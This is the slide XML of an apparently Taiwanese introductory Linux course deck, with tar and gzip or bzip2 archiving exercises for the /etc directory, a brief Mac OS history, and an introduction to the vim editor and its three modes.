              <a:ext cx="36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098960" y="460692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079640" y="4336920"/>
              <a:ext cx="895680" cy="133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063800" y="4273560"/>
                <a:ext cx="92736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1871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’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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄下所有檔案進行只打包及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>壓縮，打包到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>家目錄下，打包檔名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>etc.tar.gz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’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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>下所有檔案進行只打包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>bzip2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>壓縮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>，打包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>’/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>etcback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>打包檔名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>etc.tar.bz2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etc.tar.bz2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>壓縮至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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>目錄內。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>打包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>壓縮及解壓縮</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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49" y="6021288"/>
            <a:ext cx="8888947" cy="62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筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="-317520" y="469800"/>
              <a:ext cx="2832480" cy="16704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-333360" y="406440"/>
                <a:ext cx="2864160" cy="1797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6080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endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>七</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>文書</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>編輯軟體</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" algn="ctr">
              <a:buNone/>
            </a:pP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909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多數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>系統中預設的文字編輯器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>大量的快速鍵指令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>簡單的程式語法除錯機制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M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>編輯器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>簡介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6702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Mac </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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OS X/OS X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TW" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>麥金塔電腦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的作業系統Mac OSㄧ直都是由蘋果公司自行開發，Mac OS可以算是圖形化使用者介面(Graphic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interface;GUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)的鼻祖，早在1984年，麥金塔電</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>腦就已經開始使用圖形化介面(微軟在1985才開始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 1.0的開發) ，Mac OS X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>開始使用於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>BSD Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>的核心</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>，大大改進記憶體管理，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>也</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>因為外型前衛新穎及效能頗受好評，深受年輕族群愛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>戴</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>重新將系統重新命名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="標楷體"/>
                <a:ea typeface="標楷體"/>
              </a:rPr>
              <a:t>「</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> Mac OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="標楷體"/>
                <a:ea typeface="標楷體"/>
              </a:rPr>
              <a:t>」</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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2775960" y="3677040"/>
              <a:ext cx="4062960" cy="266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60120" y="3613680"/>
                <a:ext cx="409464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441320" y="1541520"/>
              <a:ext cx="143748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25480" y="1477800"/>
                <a:ext cx="14691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99360" y="1554480"/>
              <a:ext cx="1679040" cy="198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83520" y="1491120"/>
                <a:ext cx="17107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447800" y="1521720"/>
              <a:ext cx="1261080" cy="39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431960" y="1458360"/>
                <a:ext cx="1292760" cy="166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874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200" dirty="0"/>
              <a:t>所有的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>Unix Like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>系統都會內建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>文書編輯器，其他的文書編輯器則不一定會</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>存在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/>
              <a:t>很多個別軟體的編輯介面都會主動呼叫 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>具有程式編輯的能力，可以主動的以字體顏色辨別語法的正確性，方便</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>程式設計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/>
              <a:t>因為程式簡單，編輯速度相當快速。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為何要學 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim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03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000" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>可以用顏色或底線等方式來顯示一些特殊的資訊。 舉例來說，當你使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>去編輯一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>程式語言的檔案，或者是我們後續會談到的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>shell script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>腳本程式時，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>會依據檔案的副檔名或者是檔案內的開頭資訊， 判斷該檔案的內容而自動的呼叫該程式的語法判斷式，再以顏色來顯示程式碼與一般資訊。也就是說， 這個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>是個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>程式編輯器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>啦！甚至一些 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>基礎設定檔內的語法，都能夠用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>檢查。</a:t>
            </a:r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為何要學 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim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8455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/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>原本是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>Unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>的文書編輯器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>後來 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>也延用了此傳統的編輯器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>因此許多人習慣以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案名稱指令來編輯文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>編輯器會將註解、變數等文字加上顏色</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>讓使用者可以方便地編輯設定檔、程式碼等檔案。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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>差異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503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3200" dirty="0"/>
              <a:t>在開始操作之前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>要先提醒您關於按鍵大小寫的使用問題。在操作 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>時 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>許多時候會使用小寫的英文按鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>因此本節在使用按鍵命令時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>若標示為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>即表示是用小寫的字母 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"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/>
              <a:t>若您編輯的檔案內有中文的話</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>可能會發生出現亂碼的情形。</a:t>
            </a:r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功能強大的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>文書編輯軟體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9776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im</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的三種模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="fig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69" y="2500312"/>
            <a:ext cx="6753231" cy="276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字方塊 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="1527175"/>
            <a:ext cx="2016224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sz="2400" dirty="0" smtClean="0"/>
              <a:t>一進</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>vim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>就是</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="24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7243068" y="5589240"/>
            <a:ext cx="576064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dirty="0" smtClean="0"/>
              <a:t>:/?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="直線單箭頭接點 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1907704" y="1988840"/>
            <a:ext cx="144016" cy="47443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 flipH="1" flipV="1">
            <a:off x="6948264" y="5000625"/>
            <a:ext cx="294804" cy="53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8" name="文字方塊 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3491880" y="5589240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Vim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三種模式的互相關係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102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執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>vim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>如何開啟既有文字檔？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>編寫文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>儲存檔案、離開 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>vim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im </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的基本操作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4499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415" y="1481138"/>
            <a:ext cx="5609169" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim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35496" y="4509120"/>
            <a:ext cx="1656184" cy="13849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/>
              <a:t>這些符號</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表示還不能用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直線單箭頭接點 7"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="5" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="828092" y="3744119"/>
            <a:ext cx="939323" cy="76500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790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進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>時預設的模式是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>normal mode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>無法輸入文字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>現在我們要開始編寫一個文字檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>請按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
